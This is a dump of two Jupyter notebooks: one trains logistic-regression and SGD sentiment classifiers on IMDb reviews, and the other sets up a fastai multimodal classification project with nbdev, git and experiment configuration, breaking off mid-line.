e72f20e5c156d47a0937e993741f67ed8f95accb
25,782
ipynb
Jupyter Notebook
.ipynb_checkpoints/sentiment_analysis-checkpoint.ipynb
prakharchoudhary/SentimentalAnalysis
429d2ae9a72f1ced13ef47d0db9bb18186f552e1
[ "MIT" ]
null
null
null
.ipynb_checkpoints/sentiment_analysis-checkpoint.ipynb
prakharchoudhary/SentimentalAnalysis
429d2ae9a72f1ced13ef47d0db9bb18186f552e1
[ "MIT" ]
null
null
null
.ipynb_checkpoints/sentiment_analysis-checkpoint.ipynb
prakharchoudhary/SentimentalAnalysis
429d2ae9a72f1ced13ef47d0db9bb18186f552e1
[ "MIT" ]
null
null
null
27.42766
664
0.491583
[ [ [ "<h1>\nSentiment analysis\n</h1>\n<ul>\n<li>Dataset used: IMDb movies dataset(http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz)</li>", "_____no_output_____" ] ], [ [ "import pyprind\nimport pandas as pd\nimport os\nimport io", "_____no_output_____" ], [ "\"\"\"\nOrganise the given dataset into operatable datastructure\nWe shall use Pandas DataFrames\n\"\"\"\npbar = pyprind.ProgBar(50000)\nlabels = {'pos':1, 'neg':0}\n\ndf = pd.DataFrame()\n\nfor s in ('test', 'train'):\n for l in ('pos', 'neg'):\n path = './aclImdb/%s/%s' % (s, l)\n for file in os.listdir(path):\n with io.open(os.path.join(path, file), 'r', encoding='utf-8') as infile:\n txt = infile.read()\n df = df.append([[txt, labels[l]]], ignore_index=True)\n pbar.update()\ndf.columns = ['review', 'sentiment']", "0% [##############################] 100% | ETA: 00:00:00\nTotal time elapsed: 00:09:08\n" ], [ "'''\nsave the organised data in a csv file\n'''\nimport numpy as np\nnp.random.seed(0)\ndf = df.reindex(np.random.permutation(df.index))\ndf.to_csv('./movie_data.csv', index=False, encoding='utf-8')", "_____no_output_____" ], [ "'''\nload data from the csv file\n'''\ndf = pd.read_csv('./movie_data.csv')\ndf.head(3)", "_____no_output_____" ], [ "\"\"\"\npreprocessing data\n\"\"\"\n\nimport re\ndef preprocessor(text):\n text = re.sub('<[^>]*>', '', text) #removes the HTML markup\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)', text) #finds emoticons\n text = re.sub('[\\W]+', ' ', text.lower()) + ''.join(emoticons).replace('-', '') \n return text\n\ndf['review'] = df['review'].apply(preprocessor)", "_____no_output_____" ], [ "preprocessor(df.loc[0, 'review'][-50:]) # example", "_____no_output_____" ], [ "preprocessor(\"</a>This :) is :( a test :-)!\") # example", "_____no_output_____" ], [ "#Processing documents into tokens\nfrom nltk.stem.porter import PorterStemmer\n\nporter = PorterStemmer()\n\ndef tokenizer(text):\n return text.split()\n\n\ndef tokenizer_porter(text):\n return [porter.stem(word) for word in text.split()]\n\n# exemplary run\ntokenizer_porter('runners like running and thus they run')", "_____no_output_____" ], [ "import nltk\nnltk.download('stopwords')\n\"\"\"\nstopwords are those words that are very common in a language\nand are thus likely to bear little to no value\nThere are 127 such stopwords in nltk library for\nenglish language.\"\"\"", "[nltk_data] Downloading package stopwords to /home/pc/nltk_data...\n[nltk_data] Package stopwords is already up-to-date!\n" ], [ "# example: how to use\nfrom nltk.corpus import stopwords\nstop = stopwords.words('english')\n[w for w in tokenizer_porter('a runner likes running and runs alot')[-10:] if w not in stop]", "_____no_output_____" ] ], [ [ "<h2>Training a logistic regression model for document classification</h2>", "_____no_output_____" ] ], [ [ "# Added version check for recent scikit-learn 0.18 checks\nfrom distutils.version import LooseVersion as Version\nfrom sklearn import __version__ as sklearn_version", "_____no_output_____" ], [ "#we will use simple bag-of-words model\nX_train = df.loc[:25000, 'review'].values\ny_train = df.loc[:25000, 'sentiment'].values\nX_test = df.loc[25000:, 'review'].values\ny_test = df.loc[25000:, 'sentiment'].values\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nif Version(sklearn_version) < '0.18':\n from sklearn.grid_search import GridSearchCV\nelse:\n from sklearn.model_selection import GridSearchCV\n\ntfidf = TfidfVectorizer(strip_accents=None,\n lowercase=False,\n preprocessor=None)\n\nparam_grid = [{'vect__ngram_range': [(1, 1)],\n 'vect__stop_words': [stop, None],\n 'vect__tokenizer': [tokenizer, tokenizer_porter],\n 'clf__penalty': ['l1', 'l2'],\n 'clf__C': [1.0, 10.0, 100.0]},\n {'vect__ngram_range': [(1, 1)],\n 'vect__stop_words': [stop, None],\n 'vect__tokenizer': [tokenizer, tokenizer_porter],\n 'vect__use_idf':[False],\n 'vect__norm':[None],\n 'clf__penalty': ['l1', 'l2'],\n 'clf__C': [1.0, 10.0, 100.0]},\n ]\n\nlr_tfidf = Pipeline([('vect', tfidf),\n ('clf', LogisticRegression(random_state=0))])\n\ngs_lr_tfidf = GridSearchCV(lr_tfidf, param_grid,\n scoring='accuracy',\n cv=5,\n verbose=1,\n n_jobs=-1)", "_____no_output_____" ], [ "gs_lr_tfidf.fit(X_train, y_train)", "Fitting 5 folds for each of 48 candidates, totalling 240 fits\n" ], [ "print('Best parameter set: %s '% gs_lr_tfidf.best_params_)\nprint('CV Accuracy: %.3f'%gs_lr_tfidf.best_score_)", "Best parameter set: {'vect__ngram_range': (1, 1), 'vect__tokenizer': <function tokenizer at 0x7f709890d7d0>, 'clf__penalty': 'l2', 'clf__C': 10.0, 'vect__stop_words': None} \nCV Accuracy: 0.892\n" ], [ "clf = gs_lr_tfidf.best_estimator_\nprint('Test Accuracy: %.3f' % clf.score(X_test, y_test))", "Test Accuracy: 0.901\n" ] ], [ [ "<h4>Start Comment:</h4>", "_____no_output_____" ] ], [ [ "\"\"\"\nPlease note that gs_lr_tfidf.best_score_ is the average k-fold cross-validation score. \nI.e., if we have a GridSearchCV object with 5-fold cross-validation (like the one above), \nthe best_score_ attribute returns the average score over the 5-folds of the best model.\n\"\"\"\n\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nif Version(sklearn_version) < '0.18':\n from sklearn.cross_validation import StratifiedKFold\n from sklearn.cross_validation import cross_val_score\nelse:\n from sklearn.model_selection import StratifiedKFold\n from sklearn.model_selection import cross_val_score\n\nnp.random.seed(0)\nnp.set_printoptions(precision=6)\ny = [np.random.randint(3) for i in range(25)]\nX = (y + np.random.randn(25)).reshape(-1, 1)\n\nif Version(sklearn_version) < '0.18':\n cv5_idx = list(StratifiedKFold(y, n_folds=5, shuffle=False, random_state=0))\n\nelse:\n cv5_idx = list(StratifiedKFold(n_splits=5, shuffle=False, random_state=0).split(X, y))\n \ncross_val_score(LogisticRegression(random_state=123), X, y, cv=cv5_idx)", "_____no_output_____" ], [ "if Version(sklearn_version) < '0.18':\n from sklearn.grid_search import GridSearchCV\nelse:\n from sklearn.model_selection import GridSearchCV\n\ngs = GridSearchCV(LogisticRegression(), {}, cv=cv5_idx, verbose=3).fit(X, y)", "Fitting 5 folds for each of 1 candidates, totalling 5 fits\n[CV] ................................................................\n[CV] ....................................... , score=0.600000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... , score=0.400000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... , score=0.600000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... , score=0.200000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... , score=0.600000 - 0.0s\n" ], [ "gs.best_score_", "_____no_output_____" ], [ "cross_val_score(LogisticRegression(), X, y, cv=cv5_idx).mean()", "_____no_output_____" ] ], [ [ "<h4>End Comment</h4>", "_____no_output_____" ], [ "\n\n\n<h1>Working with bigger data - online algorithms and out-of-core learning</h1>", "_____no_output_____" ] ], [ [ "import numpy as np\nimport re\nfrom nltk.corpus import stopwords\n\ndef tokenizer(text):\n text = re.sub('<[^>]*>', '', text)\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)', text.lower())\n text = re.sub('[\\W]+', ' ', text.lower()) + ' '.join(emoticons).replace('-', '')\n tokenized = [w for w in text.split() if w not in stop]\n return tokenized\n\ndef stream_docs(path):\n with io.open(path, 'r', encoding='utf-8') as csv:\n next(csv) # skip header\n for line in csv:\n text, label = line[:-3], int(line[-2])\n yield text, label", "_____no_output_____" ], [ "next(stream_docs(path='./movie_data.csv'))", "_____no_output_____" ], [ "def get_minibatch(doc_stream, size):\n docs, y = [], []\n try:\n for _ in range(size):\n text, label = next(doc_stream)\n docs.append(text)\n y.append(label)\n except StopIteration:\n return None, None\n return docs, y", "_____no_output_____" ], [ "from sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.linear_model import SGDClassifier\nvect = HashingVectorizer(decode_error='ignore',\n n_features = 2**21,\n preprocessor = None,\n tokenizer=tokenizer\n )\nclf = SGDClassifier(loss='log', random_state=1, n_iter=1)\ndoc_stream = stream_docs(path='./movie_data.csv')", "_____no_output_____" ], [ "pbar = pyprind.ProgBar(45)\nclasses = np.array([0,1])\nfor _ in range(45):\n X_train, y_train = get_minibatch(doc_stream, size=1000)\n if not X_train:\n break\n X_train = vect.transform(X_train)\n clf.partial_fit(X_train, y_train, classes=classes)\n pbar.update()", "0% [##############################] 100% | ETA: 00:00:00\nTotal time elapsed: 00:00:36\n" ], [ "X_test, y_test = get_minibatch(doc_stream, size=5000)\nX_test = vect.transform(X_test)\nprint('Accuracy: %.3f' % clf.score(X_test, y_test))", "Accuracy: 0.883\n" ], [ "clf = clf.partial_fit(X_test, y_test)", "_____no_output_____" ] ], [ [ "<h3>Serializing fitted scikit-learn estimators</h3>", "_____no_output_____" ] ], [ [ "'''\nserialize the classifier as a pickle file\n'''\n\nimport pickle\nimport os\n\ndest = os.path.join('movieclassifier', 'pkl_objects')\nif not os.path.exists(dest):\n os.makedirs(dest)\n \n# we serialize our stopwords so that we do not have to install NLTK on our servers \npickle.dump(stop,\n open(os.path.join(dest, 'stopwords.pkl'), 'wb')\n )\n\npickle.dump(clf,\n open(os.path.join(dest, 'classifier.pkl'), 'wb')\n )", "_____no_output_____" ], [ "%%writefile movieclassifier/vectorizer.py\n\"\"\"\nSince 'HashingVectorizer' does not need to be fitted, we dont have to pickle it.\nRather this script will be used to import the vectorizer in the main file.\n\"\"\"\nimport re\nimport os\nimport pickle\n\nfrom sklearn.feature_extraction.text import HashingVectorizer\n\nprint os.getcwd()\ncur_dir = os.path.dirname(__file__)\nstop = pickle.load(open(\n os.path.join(cur_dir, \n 'pkl_objects', \n 'stopwords.pkl'), 'rb'))\n\ndef tokenizer(text):\n text = re.sub('<[^>]*>', '', text)\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)',\n text.lower())\n text = re.sub('[\\W]+', ' ', text.lower()) \\\n + ' '.join(emoticons).replace('-', '')\n tokenized = [w for w in text.split() if w not in stop]\n return tokenized\n\nvect = HashingVectorizer(decode_error='ignore',\n n_features=2**21,\n preprocessor=None,\n tokenizer=tokenizer)", "Overwriting movieclassifier/vectorizer.py\n" ], [ "os.chdir('movieclassifier')", "_____no_output_____" ], [ "import os\n\nimport pickle\nimport re\nfrom vectorizer import vect\n\nclf = pickle.load(open(os.path.join('pkl_objects', 'classifier.pkl'), 'rb'))", "_____no_output_____" ], [ "import numpy as np\nlabel = {0:'negative', 1:'positive'}\n\nexample = ['I love this movie']\nX = vect.transform(example)\nprint('Prediction: {}\\nProbability: {:.2f}'.format(label[clf.predict(X)[0]], clf.predict_proba(X).max()*100))", "Prediction: positive\nProbability: 85.93\n" ] ], [ [ "<h3>Finished</h3>", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ] ]
e72f2d7f6402f16dc1188af3f52fe27ab2871998
830,162
ipynb
Jupyter Notebook
nbs/fastai_multimodal.ipynb
wjlgatech/fastai_multimodal
e307e81b12010d5f1afdc10c2c7efc524c85219d
[ "Apache-2.0" ]
null
null
null
nbs/fastai_multimodal.ipynb
wjlgatech/fastai_multimodal
e307e81b12010d5f1afdc10c2c7efc524c85219d
[ "Apache-2.0" ]
null
null
null
nbs/fastai_multimodal.ipynb
wjlgatech/fastai_multimodal
e307e81b12010d5f1afdc10c2c7efc524c85219d
[ "Apache-2.0" ]
null
null
null
68.489564
216,833
0.511226
[ [ [ "# default_exp core", "_____no_output_____" ] ], [ [ "# 01_core Objectives\nTo create end-to-end multimodal classifers based on Fastai-tabular, Fastai-text and Fastai-vision.\n\nSpecifically, I will construct 3 types of multimodal model:\n\n- `early concat`: concatinate cnt, cat, txt, img after data loading and data preprocessing, followed by a learner of choice (e.g. fastai tabular).\n- `middle concat`: concatinate the embeddings from each of the trained tab (cnt+cat), txt, img models, followed by a learner of choice.\n- `late concat`: concatinate the probability predictions from each of the trained tab(cnt+cat), txt, img models, followed by a learner of choice.\n\nUsing a few benchmark datasets, I will compare the 3 types of multimodal models on their\n\n- computation efficiency\n- ML performance\n- interpretability\n\n\n**Note**: this notebook is inheriated from [03_tech_nontech_classification.ipynb](https://colab.research.google.com/drive/1H23iYu2UNNMC4XMqQF72IJcQS6yrrHcB?usp=sharing)\n", "_____no_output_____" ], [ "## dev plan\n\n**Features to Build**\n- [/5] For iu data: use the majority vote of k nearest neightbors as recommendation/prediction. Here neighbors can be selected from both the iu population (knn of iu_embs) and same person's past meeting (knn of i_embs).\n\nReference: [calpal-recommenders-part1-fastai.ipynb](https://colab.research.google.com/drive/19HlugtvFmzarBi0WRYmc4_xW4_9QD3lH?usp=sharing)\n- [/5] Error Analysis for end2end model, confusion matrix, classification report, df_FP, df_FN\n- [/5] `early concat` method: create hybrid dataloader\n- [/5] XAI feature importance for both population and individual; what-if analysis\n- [/5] Feature selection\n- [/5] hyperparameter-tuning \n- [/5] learning from big data by dask https://gdmarmerola.github.io/big-data-ml-training/\n\n**Features Built**\n- [5/5] modeling txt_cols: train_fastai_text_classifier(), get_fastai_docs_embs()\n\n- [5/5] modeling img_cols: train_fastai_image_classifier(), get_fastai_imgs_embs()\n\n- [5/5] modeling tab_cols=cnt_cols+cat_cols: train_fastai_tabular_classifier(), get_fastai_tab_embs()\n- [5/5] ensembled modeling embs_ls, probs_ls: train_ensembled_classifier()\n\n- [5/5] end to end modeling txt_cols, img_cols, tab_cols: Fastai_Multimodal_Classifier()\n\n- [5/5] construct 4 benchmark datasets: \n - dataset0 (cnt, cat): income_level\n - dataset1 (txt, img) : entailment \n - dataset2 (cnt, cat, txt): pet adoption speed\n - dataset3 (cnt, cat, txt): salary\n\n- [5/5] experiment configuration: \n - i: select which dataset\n - nrows: select the size of df (for fast prototyping)", "_____no_output_____" ], [ "# install packages", "_____no_output_____" ] ], [ [ "!pip install nbdev\n\n# install most updated fastai & utils\n! [ -e /content ] && pip install -Uqq fastai \n#!pip install git+https://github.com/fastai/fastai # to deal with Error: found at least two devices, cuda:0 and cpu\n\"\"\"\n!pip install fastai wwf bayesian-optimization -q --upgrade\n!pip install autogluon\n\"\"\"\n\n# auto 'RESET RUNTIME'\ntry:\n import nbdev\nexcept ImportError:\n import os\n os.kill(os.getpid(), 9)", "Requirement already satisfied: nbdev in /usr/local/lib/python3.7/dist-packages (1.2.5)\nRequirement already satisfied: jupyter-client<8 in /usr/local/lib/python3.7/dist-packages (from nbdev) (7.2.2)\nRequirement already satisfied: Jinja2<3.1.0 in /usr/local/lib/python3.7/dist-packages (from nbdev) (2.11.3)\nRequirement already satisfied: fastcore>=1.4.1 in /usr/local/lib/python3.7/dist-packages (from nbdev) (1.4.1)\nRequirement already satisfied: pip in /usr/local/lib/python3.7/dist-packages (from nbdev) (21.1.3)\nRequirement already satisfied: ipykernel in /usr/local/lib/python3.7/dist-packages (from nbdev) (4.10.1)\nRequirement already satisfied: fastrelease in /usr/local/lib/python3.7/dist-packages (from nbdev) (0.1.12)\nRequirement already satisfied: jupyter in /usr/local/lib/python3.7/dist-packages (from nbdev) (1.0.0)\nRequirement already satisfied: pyyaml in /usr/local/lib/python3.7/dist-packages (from nbdev) (3.13)\nRequirement already satisfied: ghapi in /usr/local/lib/python3.7/dist-packages (from nbdev) (0.1.20)\nRequirement already satisfied: nbconvert>=6.1 in /usr/local/lib/python3.7/dist-packages (from nbdev) (6.4.5)\nRequirement already satisfied: nbformat>=4.4.0 in /usr/local/lib/python3.7/dist-packages (from nbdev) (5.2.0)\nRequirement already satisfied: packaging in /usr/local/lib/python3.7/dist-packages (from nbdev) (21.3)\nRequirement already satisfied: MarkupSafe>=0.23 in /usr/local/lib/python3.7/dist-packages (from Jinja2<3.1.0->nbdev) (2.0.1)\nRequirement already satisfied: tornado>=6.0 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (6.1)\nRequirement already satisfied: traitlets in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (5.1.1)\nRequirement already satisfied: python-dateutil>=2.8.2 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (2.8.2)\nRequirement already satisfied: nest-asyncio>=1.5.4 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (1.5.4)\nRequirement already satisfied: jupyter-core>=4.9.2 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (4.9.2)\nRequirement already satisfied: entrypoints in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (0.4)\nRequirement already satisfied: pyzmq>=22.3 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (22.3.0)\nRequirement already satisfied: jupyterlab-pygments in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.1.2)\nRequirement already satisfied: beautifulsoup4 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (4.6.3)\nRequirement already satisfied: mistune<2,>=0.8.1 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.8.4)\nRequirement already satisfied: pandocfilters>=1.4.1 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (1.5.0)\nRequirement already satisfied: nbclient<0.6.0,>=0.5.0 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.5.13)\nRequirement already satisfied: bleach in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (4.1.0)\nRequirement already satisfied: pygments>=2.4.1 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (2.6.1)\nRequirement already satisfied: testpath in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.6.0)\nRequirement already satisfied: defusedxml in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.7.1)\nRequirement already satisfied: jsonschema!=2.5.0,>=2.4 in /usr/local/lib/python3.7/dist-packages (from nbformat>=4.4.0->nbdev) (4.3.3)\nRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (3.10.0.2)\nRequirement already satisfied: pyrsistent!=0.17.0,!=0.17.1,!=0.17.2,>=0.14.0 in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (0.18.1)\nRequirement already satisfied: importlib-resources>=1.4.0 in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (5.4.0)\nRequirement already satisfied: importlib-metadata in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (4.11.3)\nRequirement already satisfied: attrs>=17.4.0 in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (21.4.0)\nRequirement already satisfied: zipp>=3.1.0 in /usr/local/lib/python3.7/dist-packages (from importlib-resources>=1.4.0->jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (3.7.0)\nRequirement already satisfied: six>=1.5 in /usr/local/lib/python3.7/dist-packages (from python-dateutil>=2.8.2->jupyter-client<8->nbdev) (1.15.0)\nRequirement already satisfied: webencodings in /usr/local/lib/python3.7/dist-packages (from bleach->nbconvert>=6.1->nbdev) (0.5.1)\nRequirement already satisfied: ipython>=4.0.0 in /usr/local/lib/python3.7/dist-packages (from ipykernel->nbdev) (5.5.0)\nRequirement already satisfied: pickleshare in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (0.7.5)\nRequirement already satisfied: decorator in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (4.4.2)\nRequirement already satisfied: prompt-toolkit<2.0.0,>=1.0.4 in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (1.0.18)\nRequirement already satisfied: setuptools>=18.5 in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (57.4.0)\nRequirement already satisfied: pexpect in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (4.8.0)\nRequirement already satisfied: simplegeneric>0.8 in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (0.8.1)\nRequirement already satisfied: wcwidth in /usr/local/lib/python3.7/dist-packages (from prompt-toolkit<2.0.0,>=1.0.4->ipython>=4.0.0->ipykernel->nbdev) (0.2.5)\nRequirement already satisfied: qtconsole in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (5.2.2)\nRequirement already satisfied: ipywidgets in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (7.7.0)\nRequirement already satisfied: jupyter-console in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (5.2.0)\nRequirement already satisfied: notebook in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (5.3.1)\nRequirement already satisfied: ipython-genutils~=0.2.0 in /usr/local/lib/python3.7/dist-packages (from ipywidgets->jupyter->nbdev) (0.2.0)\nRequirement already satisfied: jupyterlab-widgets>=1.0.0 in /usr/local/lib/python3.7/dist-packages (from ipywidgets->jupyter->nbdev) (1.1.0)\nRequirement already satisfied: widgetsnbextension~=3.6.0 in /usr/local/lib/python3.7/dist-packages (from ipywidgets->jupyter->nbdev) (3.6.0)\nRequirement already satisfied: terminado>=0.8.1 in /usr/local/lib/python3.7/dist-packages (from notebook->jupyter->nbdev) (0.13.3)\nRequirement already satisfied: Send2Trash in /usr/local/lib/python3.7/dist-packages (from notebook->jupyter->nbdev) (1.8.0)\nRequirement already satisfied: ptyprocess in /usr/local/lib/python3.7/dist-packages (from terminado>=0.8.1->notebook->jupyter->nbdev) (0.7.0)\nRequirement already satisfied: pyparsing!=3.0.5,>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging->nbdev) (3.0.7)\nRequirement already satisfied: qtpy in /usr/local/lib/python3.7/dist-packages (from qtconsole->jupyter->nbdev) (2.0.1)\n" ] ], [ [ "# nbdev setup", "_____no_output_____" ], [ "Since we don't have access to our Drive yet, be sure to hit the `Mount Drive` to mount it", "_____no_output_____" ] ], [ [ "#colab\nfrom google.colab import drive\ndrive.mount('/content/drive')", "Mounted at /content/drive\n" ] ], [ [ "Now let's work out of our new library", "_____no_output_____" ] ], [ [ "from pathlib import Path\nimport os\n!pwd", "/content\n" ], [ "git_path = Path('drive/My Drive/fastai_multimodal')\n#git_path = Path('drive/My Drive/techskills')\nos.chdir(git_path)\n!pwd\n", "/content/drive/My Drive/fastai_multimodal\n" ], [ "#export\nfrom nbdev_colab.core import *", "_____no_output_____" ] ], [ [ "We'll make a quick addition function", "_____no_output_____" ], [ "Now let's put in our hooks and update our library. We can just work out of our local directory now as we changed our working directory", "_____no_output_____" ] ], [ [ "#colab\nsetup_git('.', 'fastai_multimodal', 'wjlgatech', 'my-github-token', '[email protected]')", "_____no_output_____" ], [ "#colab\n#git_push('.', '01 after simplify and re-organize this notebook')", "_____no_output_____" ], [ "start = os.getcwd()\nos.chdir('.')\n", "_____no_output_____" ], [ "!nbdev_install_git_hooks\n!nbdev_build_lib\n!git add *", "Executing: git config --local include.path ../.gitconfig\nSuccess: hooks are installed and repo's .gitconfig is now trusted\nConverted 00_core.ipynb.\nConverted 01_modules.ipynb.\nConverted fastai2_multimodal_tabtxt_public.ipynb.\nConverted fastai_multimodal.ipynb.\nConverted index.ipynb.\n" ], [ "!git commit -m \"04/01/22 5:40pm add Error Analysis & bigdata ML 2 solutions\"\n!git push origin master", "[master e6f3cf4] 04/01/22 5:40pm add Error Analysis & bigdata ML 2 solutions\n 11 files changed, 3685 insertions(+), 485 deletions(-)\n rewrite model/tabular_ensemble_enbeddings.pth (94%)\n rewrite model/tabular_model.pth (89%)\nremote: Invalid username or password.\nfatal: Authentication failed for 'https://wjlgatech:[email protected]/wjlgatech/fastai_multimodal.git/'\n" ] ], [ [ "# load packages", "_____no_output_____" ] ], [ [ "!pip install fastai wwf bayesian-optimization -q --upgrade \n", "\u001b[?25l\r\u001b[K |▊ | 10 kB 24.8 MB/s eta 0:00:01\r\u001b[K |█▌ | 20 kB 10.2 MB/s eta 0:00:01\r\u001b[K |██▎ | 30 kB 14.1 MB/s eta 0:00:01\r\u001b[K |███ | 40 kB 4.4 MB/s eta 0:00:01\r\u001b[K |███▉ | 51 kB 5.0 MB/s eta 0:00:01\r\u001b[K |████▋ | 61 kB 6.0 MB/s eta 0:00:01\r\u001b[K |█████▎ | 71 kB 6.2 MB/s eta 0:00:01\r\u001b[K |██████ | 81 kB 6.5 MB/s eta 0:00:01\r\u001b[K |██████▉ | 92 kB 7.2 MB/s eta 0:00:01\r\u001b[K |███████▋ | 102 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████▍ | 112 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████▏ | 122 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████▉ | 133 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████▋ | 143 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████▍ | 153 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████▏ | 163 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████ | 174 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████▊ | 184 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████▍ | 194 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████▏ | 204 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████ | 215 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████▊ | 225 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████▌ | 235 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████▎ | 245 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████ | 256 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████▊ | 266 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████▌ | 276 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████████▎ | 286 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████ | 296 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████▉ | 307 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████████▌ | 317 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████▎ | 327 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████████████ | 337 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████████████▉ | 348 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████████▋ | 358 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████████████▍ | 368 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████ | 378 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████▉ | 389 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████████████████▋ | 399 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████████████▍ | 409 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████████████████▏| 419 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 430 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 431 kB 7.6 MB/s \n\u001b[?25h Building wheel for bayesian-optimization (setup.py) ... \u001b[?25l\u001b[?25hdone\n" ], [ "#export\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport requests\nimport re\nimport os\n\nfrom fastai.tabular.all import *\nfrom fastai.text.all import *\nfrom fastai.vision.all import *\n\nimport tensorflow as tf", "_____no_output_____" ] ], [ [ "# setup experiment\n\nNow set up experiemnt by choosing these experiment configs:\n\n- i: which dataset to choose\n- nrows: what large the dataset is\n", "_____no_output_____" ] ], [ [ "#choose the ith dataset\ni = 1\n#choose df size\nnrows=5*10**2\n\n#creat experiment config df\n\nconfig_df = pd.DataFrame({'nrows': [nrows]*5, \n 'data_file': ['df_income.csv','df_entailment.csv', 'df_adoption.csv','df_salary.csv','iu_2022_101_325.csv'],\n 'label_col':[\"income_level\", 'label', 'AdoptionSpeed', 'salary','response_status'],\n 'img_path':[None,'/root/.keras/datasets/tweet_images',None, None,None ]\n })\n\nprint(f\"===========experiment config===========\\n nrows={config_df.loc[i, 'nrows']} \\n data_file={config_df.loc[i,'data_file']}\\n label_col={config_df.loc[i, 'label_col']}\\n img_path={config_df.loc[i, 